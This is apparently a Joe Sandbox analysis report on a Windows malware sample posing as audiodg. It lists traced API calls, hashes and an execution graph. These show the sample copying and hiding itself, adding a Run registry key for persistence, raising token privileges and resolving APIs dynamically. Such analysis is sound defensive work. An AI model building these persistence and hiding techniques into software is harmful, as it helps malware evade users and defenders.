                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                  • API String ID: 4220601557-1654365787
                                                                                                                                                                  • Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                  • Instruction ID: 572ead1a65346d53afa6e67683c8d9e8ef9a9395994fffade03c501020f828b3
                                                                                                                                                                  • Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                  • Instruction Fuzzy Hash: ED31C77261EAC485DB71AF19F4987AAA3B1F788740F810125DA8DC3B68DF3CD165CB10
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF7A91B3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7A91B3784
                                                                                                                                                                    • Part of subcall function 00007FF7A91B3744: GetVolumeInformationW.KERNEL32 ref: 00007FF7A91B3801
                                                                                                                                                                    • Part of subcall function 00007FF7A91B3744: wsprintfW.USER32 ref: 00007FF7A91B38A2
                                                                                                                                                                    • Part of subcall function 00007FF7A91B38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B390D
                                                                                                                                                                    • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3922
                                                                                                                                                                    • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3935
                                                                                                                                                                    • Part of subcall function 00007FF7A91B38C4: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3945
                                                                                                                                                                    • Part of subcall function 00007FF7A91B38C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3958
                                                                                                                                                                    • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B396D
                                                                                                                                                                    • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3980
                                                                                                                                                                    • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3995
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32 ref: 00007FF7A91B3AB9
                                                                                                                                                                  • DeleteFileW.KERNEL32 ref: 00007FF7A91B3AC4
                                                                                                                                                                  • CopyFileW.KERNEL32 ref: 00007FF7A91B3ADD
                                                                                                                                                                  • SetFileAttributesW.KERNEL32 ref: 00007FF7A91B3AF5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                  • String ID: Services
                                                                                                                                                                  • API String ID: 3209240227-2319745855
                                                                                                                                                                  • Opcode ID: cabd95d3c80652fe8b367c9eb5d64b267906483226546c4ea9003bdd6899bef0
                                                                                                                                                                  • Instruction ID: fe7523f13ca97f2396291b87fea2420b614032b5b89e7fc21b05f00268e5a10a
                                                                                                                                                                  • Opcode Fuzzy Hash: cabd95d3c80652fe8b367c9eb5d64b267906483226546c4ea9003bdd6899bef0
                                                                                                                                                                  • Instruction Fuzzy Hash: A4018861B1A58252DB61FF24F4543AA93B1FB94744FD14031D24DC39B8EE2CD22ACB10
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                  • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                  • API String ID: 779948276-85274793
                                                                                                                                                                  • Opcode ID: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                  • Instruction ID: b96499bde182ee6d766777e11fa6cce4be4b2b8092ec3c359337848eaa700773
                                                                                                                                                                  • Opcode Fuzzy Hash: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                  • Instruction Fuzzy Hash: 93012936619A808ADB51AF14F44471AB7B4F7887A4F801225EB8D83F78DF7CC155CB10
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2850635065-0
                                                                                                                                                                  • Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                  • Instruction ID: 90c57c7e59dd50902081632c618d515956165548fa47239b9bce09401bb7b93d
                                                                                                                                                                  • Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                  • Instruction Fuzzy Hash: 1511EC71A0DA8681E771AF25F4883BAA3B1FB84754F814235D69D82AF8DF3DD514CB10
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                  • String ID: %08lX%04lX%lu
                                                                                                                                                                  • API String ID: 3001812590-640692576
                                                                                                                                                                  • Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                  • Instruction ID: a093925ed4b99e58a19b1d6d08544e5e862c317f23e236af5e32b69c2051a22c
                                                                                                                                                                  • Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C31072661D6C186DB31EF64F4983AAB3B1FB84700F900126E68DC3A68EF3DC519CB10
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                  • API String ID: 779948276-1428018034
                                                                                                                                                                  • Opcode ID: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                  • Instruction ID: 8d2fc9674485078fbd4ebea5737b2aa6986aeae1e4b3022979fc7a64cac25062
                                                                                                                                                                  • Opcode Fuzzy Hash: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                  • Instruction Fuzzy Hash: B1115132529A4086D7919F24F44462AB7A1FB847A0F515330F9AE83BF8DF6CD055CB10
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF7A91B38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B390D
                                                                                                                                                                    • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3922
                                                                                                                                                                    • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3935
                                                                                                                                                                    • Part of subcall function 00007FF7A91B38C4: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3945
                                                                                                                                                                    • Part of subcall function 00007FF7A91B38C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3958
                                                                                                                                                                    • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B396D
                                                                                                                                                                    • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3980
                                                                                                                                                                    • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3995
                                                                                                                                                                    • Part of subcall function 00007FF7A91B46E4: CreateFileW.KERNEL32 ref: 00007FF7A91B472B
                                                                                                                                                                    • Part of subcall function 00007FF7A91B40E4: GetCurrentProcess.KERNEL32 ref: 00007FF7A91B414B
                                                                                                                                                                    • Part of subcall function 00007FF7A91B40E4: OpenProcessToken.ADVAPI32 ref: 00007FF7A91B415E
                                                                                                                                                                    • Part of subcall function 00007FF7A91B40E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7A91B4186
                                                                                                                                                                    • Part of subcall function 00007FF7A91B40E4: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7A91B41B1
                                                                                                                                                                    • Part of subcall function 00007FF7A91B40E4: CloseHandle.KERNEL32 ref: 00007FF7A91B41BC
                                                                                                                                                                    • Part of subcall function 00007FF7A91B40E4: OpenProcess.KERNEL32 ref: 00007FF7A91B41D1
                                                                                                                                                                    • Part of subcall function 00007FF7A91B40E4: CloseHandle.KERNEL32 ref: 00007FF7A91B4249
                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00007FF7A91B3037
                                                                                                                                                                  • HeapFree.KERNEL32 ref: 00007FF7A91B304A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrcat$Process$CloseCreateFileHandleHeapOpenToken$AdjustAttributesCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
                                                                                                                                                                  • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                  • API String ID: 3992431006-2286007224
                                                                                                                                                                  • Opcode ID: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                  • Instruction ID: efc31e84b9e099eb75460d5479ab779079383af964e5f92e2f5bd2283e38feec
                                                                                                                                                                  • Opcode Fuzzy Hash: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                  • Instruction Fuzzy Hash: BF11C520A1AA8685E722FF14F8443A9A7F2FB84744FC24135D54CD6AB5DF3CA4698B60

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:23%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                  Total number of Nodes:478
                                                                                                                                                                  Total number of Limit Nodes:4
                                                                                                                                                                  execution_graph 852 7ff7179d345c 912 7ff7179d10a0 852->912 857 7ff7179d3474 ExitProcess 858 7ff7179d347c 1146 7ff7179d4264 GetCurrentProcess OpenProcessToken 858->1146 862 7ff7179d3497 863 7ff7179d34fb 862->863 864 7ff7179d34ac 862->864 867 7ff7179d3510 863->867 868 7ff7179d354c 863->868 865 7ff7179d43a4 3 API calls 864->865 866 7ff7179d34b8 865->866 869 7ff7179d34bf 866->869 870 7ff7179d34d2 ExitProcess 866->870 1161 7ff7179d43a4 CreateMutexExA 867->1161 875 7ff7179d3561 868->875 876 7ff7179d35a2 868->876 872 7ff7179d43a4 3 API calls 869->872 874 7ff7179d34cb 872->874 874->870 879 7ff7179d34da 874->879 881 7ff7179d43a4 3 API calls 875->881 1179 7ff7179d3a74 876->1179 877 7ff7179d3523 ExitProcess 878 7ff7179d352b 1174 7ff7179d327c 878->1174 1165 7ff7179d32ec 879->1165 885 7ff7179d356d 881->885 884 7ff7179d34df 889 7ff7179d34f3 ExitProcess 884->889 890 7ff7179d34e6 Sleep 884->890 891 7ff7179d3574 ExitProcess 885->891 892 7ff7179d357c 885->892 886 7ff7179d3530 893 7ff7179d3544 ExitProcess 886->893 894 7ff7179d3537 Sleep 886->894 887 7ff7179d35a7 1185 7ff7179d33ec GetVersionExW 887->1185 890->884 896 7ff7179d327c 18 API calls 892->896 894->886 899 7ff7179d3581 896->899 897 7ff7179d360e 7 API calls 898 7ff7179d35ba 900 7ff7179d43a4 3 API calls 898->900 901 7ff7179d3595 ExitProcess 899->901 902 7ff7179d3588 Sleep 899->902 903 7ff7179d35c6 900->903 902->899 904 7ff7179d35e0 ExitProcess 903->904 905 7ff7179d43a4 3 API calls 903->905 906 7ff7179d35d9 905->906 906->904 907 7ff7179d35e8 906->907 908 7ff7179d32ec 45 API calls 907->908 909 7ff7179d35ed 908->909 910 7ff7179d35f4 Sleep 909->910 911 7ff7179d3601 ExitProcess 909->911 910->909 1187 7ff7179d1000 LoadLibraryA GetProcAddress 912->1187 914 7ff7179d113a 1188 7ff7179d1000 LoadLibraryA GetProcAddress 914->1188 916 7ff7179d1154 1189 7ff7179d1050 LoadLibraryA GetProcAddress 916->1189 918 7ff7179d116e 1190 7ff7179d1050 LoadLibraryA GetProcAddress 918->1190 920 7ff7179d1188 1191 7ff7179d1050 LoadLibraryA GetProcAddress 920->1191 922 7ff7179d11a2 1192 7ff7179d1050 LoadLibraryA GetProcAddress 922->1192 924 7ff7179d11bc 1193 7ff7179d1050 LoadLibraryA GetProcAddress 924->1193 926 7ff7179d11d6 1194 7ff7179d1050 LoadLibraryA GetProcAddress 926->1194 928 7ff7179d11f0 1195 7ff7179d1050 LoadLibraryA GetProcAddress 928->1195 930 7ff7179d120a 1196 7ff7179d1050 LoadLibraryA GetProcAddress 930->1196 932 7ff7179d1224 1197 7ff7179d1050 LoadLibraryA GetProcAddress 932->1197 934 7ff7179d123e 1198 7ff7179d1000 LoadLibraryA GetProcAddress 934->1198 936 7ff7179d1258 1199 7ff7179d1000 LoadLibraryA GetProcAddress 936->1199 938 7ff7179d1272 1200 7ff7179d1000 LoadLibraryA GetProcAddress 938->1200 940 7ff7179d128c 1201 7ff7179d1000 LoadLibraryA GetProcAddress 940->1201 942 7ff7179d12a6 1202 7ff7179d1050 LoadLibraryA GetProcAddress 942->1202 944 7ff7179d12c0 1203 7ff7179d1050 LoadLibraryA GetProcAddress 944->1203 946 7ff7179d12da 1204 7ff7179d1050 LoadLibraryA GetProcAddress 946->1204 948 7ff7179d12f4 1205 7ff7179d1050 LoadLibraryA GetProcAddress 948->1205 950 7ff7179d130e 1206 7ff7179d1050 LoadLibraryA GetProcAddress 950->1206 952 7ff7179d1328 1207 7ff7179d1050 LoadLibraryA GetProcAddress 952->1207 954 7ff7179d1342 1208 7ff7179d1050 LoadLibraryA GetProcAddress 954->1208 956 7ff7179d135c 1209 7ff7179d1050 LoadLibraryA GetProcAddress 956->1209 958 7ff7179d1376 1210 7ff7179d1050 LoadLibraryA GetProcAddress 958->1210 960 7ff7179d1390 1211 7ff7179d1050 LoadLibraryA GetProcAddress 960->1211 962 7ff7179d13aa 1212 7ff7179d1050 LoadLibraryA GetProcAddress 962->1212 964 7ff7179d13c4 1213 7ff7179d1050 LoadLibraryA GetProcAddress 964->1213 966 7ff7179d13de 1214 7ff7179d1050 LoadLibraryA GetProcAddress 966->1214 968 7ff7179d13f8 1215 7ff7179d1050 LoadLibraryA GetProcAddress 968->1215 970 7ff7179d1412 1216 7ff7179d1050 LoadLibraryA GetProcAddress 970->1216 972 7ff7179d142c 1217 7ff7179d1050 LoadLibraryA GetProcAddress 972->1217 974 7ff7179d1446 1218 7ff7179d1050 LoadLibraryA GetProcAddress 974->1218 976 7ff7179d1460 1219 7ff7179d1050 LoadLibraryA GetProcAddress 976->1219 978 7ff7179d147a 1220 7ff7179d1050 LoadLibraryA GetProcAddress 978->1220 980 7ff7179d1494 1221 7ff7179d1050 LoadLibraryA GetProcAddress 980->1221 982 7ff7179d14ae 1222 7ff7179d1050 LoadLibraryA GetProcAddress 982->1222 984 7ff7179d14c8 1223 7ff7179d1050 LoadLibraryA GetProcAddress 984->1223 986 7ff7179d14e2 1224 7ff7179d1050 LoadLibraryA GetProcAddress 986->1224 988 7ff7179d14fc 1225 7ff7179d1050 LoadLibraryA GetProcAddress 988->1225 990 7ff7179d1516 1226 7ff7179d1050 LoadLibraryA GetProcAddress 990->1226 992 7ff7179d1530 1227 7ff7179d1050 LoadLibraryA GetProcAddress 992->1227 994 7ff7179d154a 1228 7ff7179d1050 LoadLibraryA GetProcAddress 994->1228 996 7ff7179d1564 1229 7ff7179d1050 LoadLibraryA GetProcAddress 996->1229 998 7ff7179d157e 1230 7ff7179d1050 LoadLibraryA GetProcAddress 998->1230 1000 7ff7179d1598 1231 7ff7179d1050 LoadLibraryA GetProcAddress 1000->1231 1002 7ff7179d15b2 1232 7ff7179d1050 LoadLibraryA GetProcAddress 1002->1232 1004 7ff7179d15cc 1233 7ff7179d1050 LoadLibraryA GetProcAddress 1004->1233 1006 7ff7179d15e6 1234 7ff7179d1050 LoadLibraryA GetProcAddress 1006->1234 1008 7ff7179d1600 1235 7ff7179d1050 LoadLibraryA GetProcAddress 1008->1235 1010 7ff7179d161a 1236 7ff7179d1050 LoadLibraryA GetProcAddress 1010->1236 1012 7ff7179d1634 1237 7ff7179d1050 LoadLibraryA GetProcAddress 1012->1237 1014 7ff7179d164e 1238 7ff7179d1050 LoadLibraryA GetProcAddress 1014->1238 1016 7ff7179d1668 1239 7ff7179d1050 LoadLibraryA GetProcAddress 1016->1239 1018 7ff7179d1682 1240 7ff7179d1050 LoadLibraryA GetProcAddress 1018->1240 1020 7ff7179d169c 1241 7ff7179d1050 LoadLibraryA GetProcAddress 1020->1241 1022 7ff7179d16b6 1242 7ff7179d1050 LoadLibraryA GetProcAddress 1022->1242 1024 7ff7179d16d0 1243 7ff7179d1050 LoadLibraryA GetProcAddress 1024->1243 1026 7ff7179d16ea 1244 7ff7179d1050 LoadLibraryA GetProcAddress 1026->1244 1028 7ff7179d1704 1245 7ff7179d1050 LoadLibraryA GetProcAddress 1028->1245 1030 7ff7179d171e 1246 7ff7179d1050 LoadLibraryA GetProcAddress 1030->1246 1032 7ff7179d1738 1247 7ff7179d1050 LoadLibraryA GetProcAddress 1032->1247 1034 7ff7179d1752 1248 7ff7179d1050 LoadLibraryA GetProcAddress 1034->1248 1036 7ff7179d176c 1249 7ff7179d1050 LoadLibraryA GetProcAddress 1036->1249 1038 7ff7179d1786 1250 7ff7179d1050 LoadLibraryA GetProcAddress 1038->1250 1040 7ff7179d17a0 1251 7ff7179d1050 LoadLibraryA GetProcAddress 1040->1251 1042 7ff7179d17ba 1252 7ff7179d1050 LoadLibraryA GetProcAddress 1042->1252 1044 7ff7179d17d4 1253 7ff7179d1050 LoadLibraryA GetProcAddress 1044->1253 1046 7ff7179d17ee 1254 7ff7179d1050 LoadLibraryA GetProcAddress 1046->1254 1048 7ff7179d1808 1255 7ff7179d1050 LoadLibraryA GetProcAddress 1048->1255 1050 7ff7179d1822 1256 7ff7179d1050 LoadLibraryA GetProcAddress 1050->1256 1052 7ff7179d183c 1257 7ff7179d1050 LoadLibraryA GetProcAddress 1052->1257 1054 7ff7179d1856 1258 7ff7179d1050 LoadLibraryA GetProcAddress 1054->1258 1056 7ff7179d1870 1259 7ff7179d1050 LoadLibraryA GetProcAddress 1056->1259 1058 7ff7179d188a 1260 7ff7179d1050 LoadLibraryA GetProcAddress 1058->1260 1060 7ff7179d18a4 1261 7ff7179d1050 LoadLibraryA GetProcAddress 1060->1261 1062 7ff7179d18be 1262 7ff7179d1050 LoadLibraryA GetProcAddress 1062->1262 1064 7ff7179d18d8 1263 7ff7179d1050 LoadLibraryA GetProcAddress 1064->1263 1066 7ff7179d18f2 1264 7ff7179d1050 LoadLibraryA GetProcAddress 1066->1264 1068 7ff7179d190c 1265 7ff7179d1050 LoadLibraryA GetProcAddress 1068->1265 1070 7ff7179d1926 1266 7ff7179d1050 LoadLibraryA GetProcAddress 1070->1266 1072 7ff7179d1940 1267 7ff7179d1050 LoadLibraryA GetProcAddress 1072->1267 1074 7ff7179d195a 1268 7ff7179d1050 LoadLibraryA GetProcAddress 1074->1268 1076 7ff7179d1974 1269 7ff7179d1050 LoadLibraryA GetProcAddress 1076->1269 1078 7ff7179d198e 1270 7ff7179d1050 LoadLibraryA GetProcAddress 1078->1270 1080 7ff7179d19a8 1271 7ff7179d1050 LoadLibraryA GetProcAddress 1080->1271 1082 7ff7179d19c2 1272 7ff7179d1050 LoadLibraryA GetProcAddress 1082->1272 1084 7ff7179d19dc 1273 7ff7179d1050 LoadLibraryA GetProcAddress 1084->1273 1086 7ff7179d19f6 1274 7ff7179d1050 LoadLibraryA GetProcAddress 1086->1274 1088 7ff7179d1a10 1275 7ff7179d1050 LoadLibraryA GetProcAddress 1088->1275 1090 7ff7179d1a2a 1276 7ff7179d1050 LoadLibraryA GetProcAddress 1090->1276 1092 7ff7179d1a44 1277 7ff7179d1050 LoadLibraryA GetProcAddress 1092->1277 1094 7ff7179d1a5e 1278 7ff7179d1050 LoadLibraryA GetProcAddress 1094->1278 1096 7ff7179d1a78 1279 7ff7179d1050 LoadLibraryA GetProcAddress 1096->1279 1098 7ff7179d1a92 1280 7ff7179d1050 LoadLibraryA GetProcAddress 1098->1280 1100 7ff7179d1aac 1281 7ff7179d1050 LoadLibraryA GetProcAddress 1100->1281 1102 7ff7179d1ac6 1282 7ff7179d1050 LoadLibraryA GetProcAddress 1102->1282 1104 7ff7179d1ae0 1283 7ff7179d1050 LoadLibraryA GetProcAddress 1104->1283 1106 7ff7179d1afa 1284 7ff7179d1050 LoadLibraryA GetProcAddress 1106->1284 1108 7ff7179d1b14 1285 7ff7179d1050 LoadLibraryA GetProcAddress 1108->1285 1110 7ff7179d1b2e 1286 7ff7179d1000 LoadLibraryA GetProcAddress 1110->1286 1112 7ff7179d1b48 1287 7ff7179d1050 LoadLibraryA GetProcAddress 1112->1287 1114 7ff7179d1b62 1288 7ff7179d1050 LoadLibraryA GetProcAddress 1114->1288 1116 7ff7179d1b7c 1289 7ff7179d1050 LoadLibraryA GetProcAddress 1116->1289 1118 7ff7179d1b96 1290 7ff7179d1050 LoadLibraryA GetProcAddress 1118->1290 1120 7ff7179d1bb0 1291 7ff7179d1050 LoadLibraryA GetProcAddress 1120->1291 1122 7ff7179d1bca 1292 7ff7179d1050 LoadLibraryA GetProcAddress 1122->1292 1124 7ff7179d1be4 1293 7ff7179d1050 LoadLibraryA GetProcAddress 1124->1293 1126 7ff7179d1bfe 1294 7ff7179d1000 LoadLibraryA GetProcAddress 1126->1294 1128 7ff7179d1c18 1295 7ff7179d1000 LoadLibraryA GetProcAddress 1128->1295 1130 7ff7179d1c32 1296 7ff7179d1050 LoadLibraryA GetProcAddress 1130->1296 1132 7ff7179d1c4c 1297 7ff7179d1050 LoadLibraryA GetProcAddress 1132->1297 1134 7ff7179d1c66 1298 7ff7179d1050 LoadLibraryA GetProcAddress 1134->1298 1136 7ff7179d1c80 1299 7ff7179d1050 LoadLibraryA GetProcAddress 1136->1299 1138 7ff7179d1c9a 1300 7ff7179d1050 LoadLibraryA GetProcAddress 1138->1300 1140 7ff7179d1cb4 1301 7ff7179d1050 LoadLibraryA GetProcAddress 1140->1301 1142 7ff7179d1cce 1143 7ff7179d321c 